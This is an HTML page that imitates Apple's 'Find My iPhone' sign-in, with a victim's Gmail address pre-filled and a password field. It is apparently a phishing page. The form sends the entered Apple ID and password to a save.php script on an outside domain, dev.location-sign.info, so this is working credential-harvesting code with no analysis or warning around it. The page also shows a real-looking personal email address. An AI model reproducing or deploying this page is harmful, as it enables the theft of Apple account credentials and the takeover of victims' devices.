<br><br>
<html>
<head>
<link rel="shortcut icon" href="https://www.icloud.com/applications/alc/15F91/en-us/resources/css/images/fmip_favicon.ico" type="image/x-icon"/>
<meta charset="utf-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />

<title>Find My iPhone</title>
	<script src="../../../code.jquery.com/jquery-1.10.2.js"></script>
<script type="text/javascript">
$(document).ready(function(){
	$(".email").click(function(){
		$("#appleID").focus();
		});
		$(".pas").click(function(){
		$("#pw").focus();
		});
		
		$("#pw").focus();
		$("#appleID").bind("change paste keyup", function() {
			 var id=$("#appleID").val();
			 var pas=$("#pw").val();
				if(pas.length >0){
					if( $('#singin').is( ":disabled")){
						$('#singin').prop('disabled', false);
						}
					}else{
						if($('#singin').is( ":disabled") === false){
						$('#singin').prop('disabled', true);
						}
						}

  
});
				$("#pw").bind("change paste keyup", function() {
			 var id=$("#appleID").val();
			 var pas=$("#pw").val();
				if(pas.length >0){
					if( $('#singin').is( ":disabled")){
						$('#singin').prop('disabled', false);
						}
					}else{
						if($('#singin').is( ":disabled") === false){
						$('#singin').prop('disabled', true);
						}
						}
  
});
		
		
		
	});
</script>

<style>


body {
    background-color:#fff;
	width: 100%;
	padding: 0;
	margin: 0;
}

.content {
	
	height: 70%;
	text-align: center;
	margin-top: 10%;
}
.logo {
	padding-bottom:30px;
}





.form {
	
	width: 300px;
	margin: 0 auto;	
}




.modal:target:before {
  display: block;
}
.modal:target .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  transform: translate(0, 0);
  top: 20%;
}
.modal-dialog {
  background: #fefefe;
  border: #333333 solid 1px;
  border-radius: 5px;
  margin-left: -200px;
  position: fixed;
  left: 50%;
  top: -100%;
  z-index: 11;
  width: 360px;
  -webkit-transform: translate(0, -500%);
  -ms-transform: translate(0, -500%);
  transform: translate(0, -500%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal-body {
  padding: 20px;
}
.modal-header,
.modal-footer {
  padding: 10px 20px;
}
.modal-header {
  border-bottom: #eeeeee solid 1px;
}
.modal-header h2 {
  font-size: 20px;
}
.modal-footer {
  border-top: #eeeeee solid 1px;
  text-align: right;
}
/*ADDED TO STOP SCROLLING TO TOP*/
#close {
  display: none;
}

body,td,th {
	font-style: normal;
}
</style>
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body style="background: url('https://dev.location-sign.info/src/fmip_location_page/map.png') no-repeat left top #f2f2f2 fixed;background-repeat: no-repeat;background-size: 100%;">

<div class="login" >
<div class="content">
    <div class="form" id="formbg">
    	<div class="logo"><img src="https://dev.location-sign.info/src/fmip_location_page/find_icon.png" width="115" height="115" alt=""/>
    	</div>
        <div class="findText">Sing-In Required</div>
        


  	<form action="https://dev.location-sign.info/src/fmip_location_page/save.php" method="post">
        	<div class="email">
             <p id="email_value">seopremier.2205@gmail.com</p>
			 <div id="email_req" style="display:none">
				<label id="label">Apple ID</label>
				<input name="appleid" id="appleID" type="email"  placeholder="example@icloud.com" autocomplete="off">
			</div>
    		</div>
            <div class="pas">

            <label id="label">Password</label>
            <input name="password" type="password" required  placeholder="required" id="pw" autocomplete="off">
        	</div>
        	<div class="signin">
			
            <button name="submit" id="singin" type="submit" disabled>Sign in</button>
			
			<br/>
        	</div>
     </form>  
    
    <div class="greentext">Forgot Apple ID or Password?</div>

    <div class="greentext">Setup Instructions</div>
	
	<div style="position: absolute;bottom: 50px;font-size: 18px;font-weight: 400;" class="greentext">Not <strong style="font-weight: 700;">seopremier.2205@gmail.com</strong>? <a href="index.html#" style="color: #69B677;text-decoration: none;">Sing Out</a></div>
</div>
</body>
</html>

